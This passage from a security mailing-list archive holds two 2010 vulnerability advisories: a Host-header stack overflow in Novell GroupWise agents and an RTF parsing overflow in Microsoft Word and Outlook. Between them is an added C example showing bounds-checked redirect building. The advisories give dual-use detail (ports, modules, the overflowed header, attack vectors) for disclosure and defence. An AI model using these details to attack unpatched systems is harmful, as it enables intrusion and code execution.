This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Groupwise. Authentication is not required to exploit this vulnerability.

The specific flaw exists in a function responsible for assembling an HTTP response. The following modules implement this functionality: gwpoa.exe, gwmta.exe, gwia.exe. When responding to an HTTP request sent to TCP port 7101 or 7100 (or, in the case of gwia.exe, the user-configured Message Transfer Port), the process uses the client-specified Host: header to create an HTTP 301 redirection message. Within this code a local stack buffer is used to store the redirect location and can be overflown with a sufficiently long header value. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user.

-- Vendor Response:
Novell states:

Linux - http://download.novell.com/Download?buildid=04oMMaiI9nI~
NetWare/Windows - http://download.novell.com/Download?buildid=aq06Eoy7rf4~

The HTTP interfaces for the GroupWise agents (Message Transfer Agent, Post Office Agent, Internet Agent, WebAccess Agent, Monitor Agent) are vulnerable to an exploit that could allow a remote attacker to execute arbitrary code on vulnerable installations of Novell Groupwise. Authentication is not required to exploit this vulnerability.

Affected versions: GroupWise 8.0x, 8.01x, 8.02.

Previous versions of GroupWise are likely also vulnerable but are no longer supported. Customers on earlier versions of GroupWise should, at a minimum, upgrade their GroupWise systems to version 8.02HP (or disable the GroupWise Agents' HTTP interfaces) in order to secure their system.

This vulnerability was discovered and reported by Anonymous working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com), ZDI-CAN-770

Novell bug 627942, CVE number pending

Related TID: http://www.novell.com/support/search.do?usemicrosite=true&searchString=7007159

-- Disclosure Timeline:
2010-06-10 - Vulnerability reported to vendor
2010-11-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

    http://twitter.com/thezdi
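The flaw described above is a fixed-size stack buffer filled from the client's Host: header while the agent builds a 301 Location. The safe pattern is to validate the client value before anything is copied and to treat a value that does not fit as an error rather than truncating or overrunning. The function below is an added example written for this page, not Novell's code; MAX_HOST_LEN and LOCATION_BUF are assumed limits, since the advisory does not state the agents' real buffer size.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limits for this example. 255 is the DNS name length limit, so a
 * longer Host value is never legitimate and is rejected outright. */
#define MAX_HOST_LEN 255
#define LOCATION_BUF 512

/* The pattern the advisory describes, written unsafely, looks like:
 *     char loc[512];
 *     sprintf(loc, "Location: http://%s/%s\r\n", host, path);  // no bound
 * Hardened version (hypothetical, not the vendor's code): bound the length
 * check before copying, refuse CR/LF and blanks (header injection), then use
 * a bounded formatter and treat truncation as failure.
 * Returns 0 on success, -1 on any rejection; out is left empty on failure. */
int build_redirect_location(const char *host, const char *path,
                            char *out, size_t outlen)
{
    const char *end = memchr(host, '\0', MAX_HOST_LEN + 1);
    int n;

    if (outlen == 0) return -1;
    out[0] = '\0';
    if (end == NULL || end == host)          /* overlong or empty Host */
        return -1;
    if (strpbrk(host, "\r\n \t") != NULL)    /* CR/LF or blanks in a header */
        return -1;
    n = snprintf(out, outlen, "Location: http://%s/%s\r\n", host, path);
    if (n < 0 || (size_t)n >= outlen) {      /* would not fit: refuse */
        out[0] = '\0';
        return -1;
    }
    return 0;
}
```

The same length and character checks applied at request-parsing time (before the Host value reaches any response builder) give a single place to log and reject oversized headers, which is also the signal an IPS filter keys on.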
[Full-disclosure] iDefense Security Advisory 11.09.10: Microsoft Word RTF File Parsing Stack Buffer Overflow Vulnerability
iDefense Security Advisory 11.09.10
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 09, 2010

I. BACKGROUND

Microsoft Word is a word processing application from Microsoft Office. For more information about Microsoft Word, see the following website:

http://office.microsoft.com/en-us/word/default.aspx

Rich-Text Format (RTF) is a document file format developed by Microsoft for cross-platform document interchange.

II. DESCRIPTION

Remote exploitation of a stack buffer overflow vulnerability in Microsoft Corp.'s Word could allow attackers to execute arbitrary code under the privileges of the targeted user.

This vulnerability specifically exists in the handling of a specific control word in an RTF document. Under certain circumstances, Word will copy its property strings into a stack buffer without checking the length, which causes a stack buffer overflow.

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code on the affected host under the context of the user who opened the malicious RTF document with Microsoft Word. Exploitation might require that the user open a specially crafted RTF document with a vulnerable application. The most likely exploitation vector involves convincing a user to open an RTF document sent to the user via e-mail or linked on a website.

Since Outlook 2007 uses the Word engine to process e-mails, it is also affected by this vulnerability. The attacker can send the user a specially crafted RTF e-mail. When this e-mail is opened or displayed in the preview pane using Outlook 2007, the vulnerability will be triggered.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Microsoft Word 2003, Microsoft Word 2007, and Microsoft Outlook 2007. The following Microsoft products are vulnerable:

 * Microsoft Office XP SP 3
 * Microsoft Office 2003 SP 3
 * Microsoft Office 2007 SP 2
 * Microsoft Office 2010 (32-bit editions)
 * Microsoft Office 2010 (64-bit editions)
 * Microsoft Office for Mac 2011

V. WORKAROUND

Microsoft recommends reading e-mail in plain-text format as a workaround.

VI. VENDOR RESPONSE

Microsoft Corp. has released patches which address this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown.

http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010- to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

08/12/2009  Initial Vendor Notification
08/12/2009  Initial Vendor Reply
11/09/2010  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by wushi of team509.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.